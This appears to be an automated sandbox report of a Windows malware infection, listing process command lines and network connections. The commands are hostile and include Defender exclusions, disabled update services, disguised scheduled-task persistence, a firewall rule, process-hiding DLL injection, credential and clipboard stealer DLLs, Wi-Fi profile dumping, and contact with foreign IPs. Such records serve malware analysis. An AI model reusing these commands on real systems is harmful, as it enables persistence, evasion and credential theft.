"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc9e2446f8,0x7ffc9e244708,0x7ffc9e244718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,10121163937086294817,17961048539716266908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6752 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc9e2446f8,0x7ffc9e244708,0x7ffc9e244718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,10121163937086294817,17961048539716266908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2208,10121163937086294817,17961048539716266908,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9256 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\2CFE.exe
C:\Users\Admin\AppData\Local\Temp\2CFE.exe
C:\Users\Admin\AppData\Local\Temp\3089.exe
C:\Users\Admin\AppData\Local\Temp\3089.exe
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\kos4.exe
"C:\Users\Admin\AppData\Local\Temp\kos4.exe"
C:\Users\Admin\AppData\Local\Temp\latestX.exe
"C:\Users\Admin\AppData\Local\Temp\latestX.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2208,10121163937086294817,17961048539716266908,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6732 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\3EF1.exe
C:\Users\Admin\AppData\Local\Temp\3EF1.exe
C:\Users\Admin\AppData\Local\Temp\4655.exe
C:\Users\Admin\AppData\Local\Temp\4655.exe
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4f4 0x508
C:\Users\Admin\AppData\Local\Temp\4C22.exe
C:\Users\Admin\AppData\Local\Temp\4C22.exe
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
C:\Users\Admin\AppData\Local\Temp\is-M00GS.tmp\LzmwAqmV.tmp
"C:\Users\Admin\AppData\Local\Temp\is-M00GS.tmp\LzmwAqmV.tmp" /SL5="$701F8,2998240,68096,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
C:\Users\Admin\AppData\Local\Temp\5173.exe
C:\Users\Admin\AppData\Local\Temp\5173.exe
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /F /TN "LAC1031-1"
C:\Users\Admin\AppData\Local\Temp\5859.exe
C:\Users\Admin\AppData\Local\Temp\5859.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 7728 -ip 7728
C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe
"C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe" -s
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7728 -s 768
C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
"C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2208,10121163937086294817,17961048539716266908,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=10144 /prefetch:8
C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe
"C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe" -i
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "Utsysc.exe" /P "Admin:N"&&CACLS "Utsysc.exe" /P "Admin:R" /E&&echo Y|CACLS "..\ea7c8244c8" /P "Admin:N"&&CACLS "..\ea7c8244c8" /P "Admin:R" /E&&Exit
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Utsysc.exe /TR "C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe" /F
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 9208 -ip 9208
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9208 -s 572
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
C:\Windows\SysWOW64\cacls.exe
CACLS "Utsysc.exe" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\ea7c8244c8" /P "Admin:R" /E
C:\Windows\SysWOW64\cacls.exe
CACLS "..\ea7c8244c8" /P "Admin:N"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\cacls.exe
CACLS "Utsysc.exe" /P "Admin:R" /E
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\465dbc52837d81\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\465dbc52837d81\cred64.dll, Main
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\465dbc52837d81\clip64.dll, Main
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\tar.exe
tar.exe -cf "C:\Users\Admin\AppData\Local\Temp\350690463354_Desktop.tar" "C:\Users\Admin\AppData\Local\Temp\_Files_\*.*"
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc9e2446f8,0x7ffc9e244708,0x7ffc9e244718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,7940508473513256756,4068123153854444736,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2348 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,7940508473513256756,4068123153854444736,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,7940508473513256756,4068123153854444736,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2700 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,7940508473513256756,4068123153854444736,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,7940508473513256756,4068123153854444736,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,7940508473513256756,4068123153854444736,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,7940508473513256756,4068123153854444736,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4936 /prefetch:1
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,7940508473513256756,4068123153854444736,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4140 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,7940508473513256756,4068123153854444736,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3488 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,7940508473513256756,4068123153854444736,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5684 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,7940508473513256756,4068123153854444736,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5684 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,7940508473513256756,4068123153854444736,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5780 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.202.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.142.81.104.in-addr.arpa | udp |
| RU | 193.233.255.73:80 | 193.233.255.73 | tcp |
| US | 8.8.8.8:53 | 73.255.233.193.in-addr.arpa | udp |
| FI | 77.91.124.1:80 | 77.91.124.1 | tcp |
| FI | 77.91.124.86:19084 | tcp | |
| US | 8.8.8.8:53 | 1.124.91.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 157.240.247.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | store.steampowered.com | udp |
| NL | 142.250.179.141:443 | accounts.google.com | tcp |
| NL | 104.85.0.101:443 | store.steampowered.com | tcp |
| US | 8.8.8.8:53 | twitter.com | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| US | 104.244.42.1:443 | twitter.com | tcp |
| JP | 23.207.106.113:443 | steamcommunity.com | tcp |
| NL | 142.250.179.141:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | 101.0.85.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.247.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.106.207.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.epicgames.com | udp |
| US | 52.0.122.33:443 | www.epicgames.com | tcp |
| US | 8.8.8.8:53 | www.paypal.com | udp |
| US | 151.101.1.21:443 | www.paypal.com | tcp |
| US | 8.8.8.8:53 | 33.122.0.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.47.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.xx.fbcdn.net | udp |
| IE | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
| IE | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
| IE | 163.70.151.21:443 | static.xx.fbcdn.net | tcp |
| US | 8.8.8.8:53 | abs.twimg.com | udp |
| US | 8.8.8.8:53 | api.twitter.com | udp |
| US | 8.8.8.8:53 | pbs.twimg.com | udp |
| US | 152.199.21.141:443 | abs.twimg.com | tcp |
| US | 152.199.21.141:443 | abs.twimg.com | tcp |
| US | 8.8.8.8:53 | video.twimg.com | udp |
| US | 93.184.220.70:443 | pbs.twimg.com | tcp |
| US | 8.8.8.8:53 | t.co | udp |
| NL | 199.232.148.158:443 | video.twimg.com | tcp |
| US | 104.244.42.69:443 | t.co | tcp |
| US | 8.8.8.8:53 | 21.151.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.21.199.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.220.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.148.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tracking.epicgames.com | udp |
| US | 54.166.243.177:443 | tracking.epicgames.com | tcp |
| US | 8.8.8.8:53 | www.paypalobjects.com | udp |
| US | 8.8.8.8:53 | community.akamai.steamstatic.com | udp |
| US | 192.229.221.25:443 | www.paypalobjects.com | tcp |
| US | 192.229.221.25:443 | www.paypalobjects.com | tcp |
| US | 192.229.221.25:443 | www.paypalobjects.com | tcp |
| NL | 23.72.252.169:443 | community.akamai.steamstatic.com | tcp |
| NL | 23.72.252.169:443 | community.akamai.steamstatic.com | tcp |
| NL | 23.72.252.169:443 | community.akamai.steamstatic.com | tcp |
| US | 8.8.8.8:53 | static-assets-prod.unrealengine.com | udp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 18.239.36.103:443 | static-assets-prod.unrealengine.com | tcp |
| US | 18.239.36.103:443 | static-assets-prod.unrealengine.com | tcp |
| NL | 88.221.25.169:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| DE | 172.217.23.214:443 | i.ytimg.com | tcp |
| US | 192.229.221.25:443 | www.paypalobjects.com | tcp |
| US | 8.8.8.8:53 | 196.168.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.252.72.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.36.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.243.166.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.25.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.23.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | facebook.com | udp |
| IE | 163.70.151.35:443 | facebook.com | tcp |
| US | 8.8.8.8:53 | store.akamai.steamstatic.com | udp |
| NL | 23.72.252.171:443 | store.akamai.steamstatic.com | tcp |
| NL | 23.72.252.171:443 | store.akamai.steamstatic.com | tcp |
| NL | 23.72.252.171:443 | store.akamai.steamstatic.com | tcp |
| US | 8.8.8.8:53 | static.ads-twitter.com | udp |
| US | 8.8.8.8:53 | 106.208.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.151.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.252.72.23.in-addr.arpa | udp |
| NL | 199.232.148.157:443 | static.ads-twitter.com | tcp |
| US | 8.8.8.8:53 | fbcdn.net | udp |
| IE | 163.70.151.35:443 | fbcdn.net | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | fbsbx.com | udp |
| US | 8.8.8.8:53 | 157.148.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | c.paypal.com | udp |
| US | 192.55.233.1:443 | tcp | |
| US | 8.8.8.8:53 | www.recaptcha.net | udp |
| NL | 142.250.179.163:443 | www.recaptcha.net | tcp |
| US | 192.55.233.1:443 | tcp | |
| US | 8.8.8.8:53 | t.paypal.com | udp |
| US | 151.101.1.35:443 | t.paypal.com | tcp |
| US | 8.8.8.8:53 | 163.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.1.101.151.in-addr.arpa | udp |
| NL | 142.250.179.163:443 | www.recaptcha.net | udp |
